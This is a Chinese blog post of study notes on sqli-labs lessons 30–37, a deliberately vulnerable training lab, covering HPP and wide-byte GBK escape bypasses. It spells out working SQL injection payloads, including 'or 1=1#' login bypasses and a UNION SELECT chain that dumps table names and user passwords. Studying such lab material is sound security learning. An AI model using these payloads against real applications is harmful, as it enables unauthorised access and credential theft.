DAY 6

sqli-labs lesson 30

  • 与上一题一样,需要用到HPP
  • 查看源代码,参数两边加上了双引号,直接使用lesson 26a与lesson 27a的脚本即可

sqli-labs lesson 31

  • 闭合符号为双引号加括号
  • 直接报错型注入

sqli-labs lesson 32(Jsp)

  • 这一题直接用Jsp处理的一个参数即可
  • 闭合符号为单引号与括号,直接报错注入

sqli-labs lesson 32(php)

  • 宽字节注入:https://www.cnblogs.com/xishaonian/p/6063961.html
  • 思路:由源码,这道题过滤单引号,并且形成’这样的字符,所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c,0x25所以URL编码为%5c%27,可以在前面加一个%df,形成%df%5c%27,也就是输入参数时,提交%df%27,过滤后形成三个字符,这三个字符在SQL中,因为编码设置为GBK,所以前面两个%df%5c会形成一个汉字,这样,%27就独立出来了。
  • 其他的直接使用联合查询语句即可

sqli-labs lesson 33

  • addslashes():

    addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号(’)、双引号(")、反斜线(\)与NUL(NULL字符)。

  • 和上一题一样

sqli-labs lesson 34

  • 这一关是POST方式
  • 用户名输入:饜’ or 1=1#
  • 其中饜是utf-16位995c的汉字,分成其中5c转换成utf-8就是\,相当于我们在\之前又加了一个\来让他失效了

sqli-labs lesson 35

  • 爆库:?id=99 UNION SELECT 1,database(),3;–+
  • 爆表:?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
  • 爆字段:?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
  • 爆记录:?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+

sqli-labs lesson 36

  • 宽字节注入,这次用FEFF335c,这是一个有意思的字符,长的这个样子:㍜
  • 检测:?id=99㍜’ UNION SELECT 1,2,3;–+
  • 其他引号用CHAR()函数绕过

sqli-labs lesson 37

  • 和上一题一样,只不过这次是POST
  • 用户名:㍜’ or 1=1;#

sqli-labs学习笔记 DAY6的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. python学习笔记-Day6(3)

    代码书写原则: 1)不能重复写代码 2)写的代码要经常变更 编程模式概述 面向过程:根据业务逻辑从上到下写垒代码 函数式:将某功能代码封装到函数中,日后便无需重复编写,仅调用函数即可 面向对象:对函数 ...

  3. python学习笔记-Day6(2)

    xml处理模块 xml是实现不同语言或程序之间进行数据交换的协议,跟json差不多,但json使用起来更简单,不过,古时候,在json还没诞生的黑暗年代,大家只能选择用xml呀,至今很多传统公司如金融 ...

  4. python学习笔记-Day6(1)

    shelve模块是一个简单的k,v将内存数据通过文件持久化的模块,可以持久化任何pickle可支持的python数据格式 >>> s=shelve.open('test') > ...

  5. 学习笔记day6:CSS3动画属性

    总结: 1: CSS动画:@keyframes  animation:ie10+:加-webkit前缀: animation 则是属于关键帧动画的范畴; 它本身被用来替代一些纯粹表现的javascri ...

  6. 学习笔记day6:position index结合

    z-index属性适用于定位元素(position 属性值为 relative 或 absolute 或 fixed的对象),用来确定定位元素在垂直于显示屏方向(称为Z轴)上的层叠顺序(stack o ...

  7. JS学习笔记Day6

    一.数组 1.数组就是个容器,里面可以存放任意类型的数 2.定义数组:1)var arr = []: 2)var arr = new Array():构造函数定义方式,如果括号中有一个整数,该正数代表 ...

  8. HTML学习笔记Day6

    一.元素类型 1.元素类型分类依据和元素类型分类 根据css显示分类,XHTML元素被分为三种类型:块状元素.内联元素.行内块元素.可变元素 2.块状元素 1)块状元素在网页中就是以块的形式显示,所谓 ...

  9. Python学习笔记 - day6 - 函数

    函数 函数在编程语言中就是完成特定功能的一个词句组(代码块),这组语句可以作为一个单位使用,并且给它取一个名字.可以通过函数名在程序的不同地方多次执行(这叫函数的调用).函数在编程语言中有基本分为:预 ...

随机推荐

  1. 【洛谷】【堆+贪心】P1484 种树

    [题目描述:] cyrcyr今天在种树,他在一条直线上挖了n个坑.这n个坑都可以种树,但为了保证每一棵树都有充足的养料,cyrcyr不会在相邻的两个坑中种树.而且由于cyrcyr的树种不够,他至多会种 ...

  2. webbench安装和简单使用

    一.安装流程 wget http://home.tiscali.cz/~cz210552/distfiles/webbench-1.5.tar.gz tar zxvf webbench-1.5.tar ...

  3. Python自动化之迭代器不能在迭代的时候更改值

    除列表外的其他序列都是不可变的, 所以危险就发生在这里. 一个序列的迭代器只是记录你当前到达第多少个元素, 所以如果你在迭代时改变了元素, 更新会立即反映到你所迭代的条目上.在迭代字典的 key 时, ...

  4. Kafka设计解析(十五)Kafka controller重设计

    转载自 huxihx,原文链接 Kafka controller重设计 目录 一.Controller是做什么的 二.Controller当前设计 三.Controller组成 四.Controlle ...

  5. 解决IOS9 下在App中无法打开其他应用的问题

    打开 info.plist 文件 ,在根节点下添加下面代码即可,这是由于IOS9新的权限管理机制的问题 <key>LSApplicationQueriesSchemes</key&g ...

  6. PyQt 5 的学习引言

    Python 是我学习的第二门编程语言,第一门编程语言是C. 曾经用C和C++的一个库(easyx库)写过图形界面应用, 感受就是难受又难看, 现在想学一下 PyQt 5 这个python的库, 用博 ...

  7. Linux学习笔记(第七章)

    目录相关操作 pwd -P 显示出实际工作目录,pwd 显示链接路径 mkdir -m 配置新建文件的权限 例:mkdir -m 711 testmkdir -p 建立多层目录,无需一层一层建立 rm ...

  8. Homebrew 使用指南

    Homebrew 是 MacOSX 上的软件包管理工具. 安装 /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.co ...

  9. hive--数据仓库

    1.1.1     hive是什么? Hive是基于 Hadoop 的一个数据仓库工具: 1.       hive本身不提供数据存储功能,使用HDFS做数据存储: 2.       hive也不分布 ...

  10. 大数据入门:Hadoop安装、环境配置及检测

    目录 1.导包Hadoop包 2.配置环境变量 3.把winutil包拷贝到Hadoop bin目录下 4.把Hadoop.dll放到system32下 5.检测Hadoop是否正常安装 5.1在ma ...